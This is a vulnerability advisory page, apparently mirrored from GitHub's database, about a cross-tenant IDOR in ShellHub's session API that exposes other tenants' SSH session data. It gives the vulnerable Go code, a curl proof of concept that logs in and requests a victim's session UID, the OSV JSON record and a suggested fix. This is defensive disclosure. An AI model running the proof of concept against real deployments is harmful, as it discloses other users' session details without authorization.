GHSA-9W9C-9W8M-W89Q

Vulnerability from github – Published: 2026-05-06 23:22 – Updated: 2026-05-14 20:43
VLAI
Summary
ShellHub has cross-tenant IDOR in `GET /api/sessions/:uid` that discloses SSH session data
Details

Summary

GET /api/sessions/:uid returns the full session object for any authenticated caller, without scoping by the caller's tenant. An authenticated user can read session records (SSH username, device UID, remote IP, terminal type, authenticated flag, timestamps) belonging to any other namespace.

Severity

CVSS 3.1: 7.5 (High) CWE-639

Affected versions

ShellHub Community v0.24.1 (by code inspection — same vulnerable pattern as GetDevice). Not plant-reproducible without an active SSH session, but the flaw is structurally identical and confirmed via static analysis.

Root cause

api/services/session.go:37-44GetSession resolves the session by UID without any tenant filter:

go func (s *service) GetSession(ctx context.Context, uid models.UID) (*models.Session, error) { session, err := s.store.SessionResolve(ctx, store.SessionUIDResolver, string(uid)) // ⚠️ missing: s.store.Options().InNamespace(tenant) ... }

The Authorize middleware only verifies presence of a tenant in the context, not ownership of the requested session.

Proof of concept

Pre-requisite: attacker has any valid user account and has obtained a session UID from the victim tenant (UIDs may leak via logs, shared session recordings, UI URLs, or through the device IDOR in the companion advisory since sessions reference devices by UID).

```bash ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"..."}' | jq -r .token)

# Attempt cross-tenant read curl -i "http://target/api/sessions/" \ -H "Authorization: Bearer $ATTACKER_TOKEN" # Expected (fixed): HTTP 403/404 # Observed (v0.24.1): HTTP 200 + full session JSON ```

Impact

  • Cross-tenant disclosure of SSH session data: target username, device UID, remote IP, authenticated status, session type, terminal, position (geolocation), started_at / last_seen timestamps.
  • Enables reconnaissance of other tenants' active users and systems; combined with session recording features, can enable deeper recon.

Suggested fix

api/services/session.go — apply InNamespace in GetSession:

go func (s *service) GetSession(ctx context.Context, uid models.UID) (*models.Session, error) { tenant := gateway.TenantFromContext(ctx) opts := []store.QueryOption{} if tenant != nil { opts = append(opts, s.store.Options().InNamespace(tenant.ID)) } session, err := s.store.SessionResolve(ctx, store.SessionUIDResolver, string(uid), opts...) ... }

Severity
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.24.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/shellhub-io/shellhub"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.24.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44423"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T23:22:39Z",
    "nvd_published_at": "2026-05-13T22:16:44Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n`GET /api/sessions/:uid` returns the full session object for any authenticated caller, without scoping by the caller\u0027s tenant. An authenticated user can read session records (SSH username, device UID, remote IP, terminal type, authenticated flag, timestamps) belonging to any other namespace.\n\n## Severity\n**CVSS 3.1: 7.5 (High)** \nCWE-639\n\n## Affected versions\nShellHub Community v0.24.1 (by code inspection \u2014 same vulnerable pattern as `GetDevice`). Not plant-reproducible without an active SSH session, but the flaw is structurally identical and confirmed via static analysis.\n\n## Root cause\n`api/services/session.go:37-44` \u2014 `GetSession` resolves the session by UID without any tenant filter:\n\n  ```go\n  func (s *service) GetSession(ctx context.Context, uid models.UID) (*models.Session, error) {\n      session, err := s.store.SessionResolve(ctx, store.SessionUIDResolver, string(uid))\n      // \u26a0\ufe0f missing: s.store.Options().InNamespace(tenant)\n      ...\n  }\n  ```\n\nThe `Authorize` middleware only verifies presence of a tenant in the context, not ownership of the requested session.\n\n## Proof of concept\n\nPre-requisite: attacker has any valid user account and has obtained a session UID from the victim tenant (UIDs may leak via logs, shared session recordings, UI URLs, or through the device IDOR in the companion advisory since sessions reference devices by UID).\n\n  ```bash\n  ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    -d \u0027{\"username\":\"attacker\",\"password\":\"...\"}\u0027 | jq -r .token)\n\n  # Attempt cross-tenant read\n  curl -i \"http://target/api/sessions/\u003cvictim-session-uid\u003e\" \\\n    -H \"Authorization: Bearer $ATTACKER_TOKEN\"\n  # Expected (fixed):   HTTP 403/404\n  # Observed (v0.24.1): HTTP 200 + full session JSON\n  ```\n\n## Impact\n  - Cross-tenant disclosure of SSH session data: target username, device UID, remote IP, authenticated status, session type, terminal, position (geolocation), started_at / last_seen timestamps.\n  - Enables reconnaissance of other tenants\u0027 active users and systems; combined with session recording features, can enable deeper recon.\n\n## Suggested fix\n`api/services/session.go` \u2014 apply `InNamespace` in `GetSession`:\n\n  ```go\n  func (s *service) GetSession(ctx context.Context, uid models.UID) (*models.Session, error) {\n      tenant := gateway.TenantFromContext(ctx)\n      opts := []store.QueryOption{}\n      if tenant != nil {\n          opts = append(opts, s.store.Options().InNamespace(tenant.ID))\n      }\n      session, err := s.store.SessionResolve(ctx, store.SessionUIDResolver, string(uid), opts...)\n      ...\n  }\n  ```",
  "id": "GHSA-9w9c-9w8m-w89q",
  "modified": "2026-05-14T20:43:19Z",
  "published": "2026-05-06T23:22:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-9w9c-9w8m-w89q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44423"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/shellhub-io/shellhub"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ShellHub has cross-tenant IDOR in `GET /api/sessions/:uid` that discloses SSH session data"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.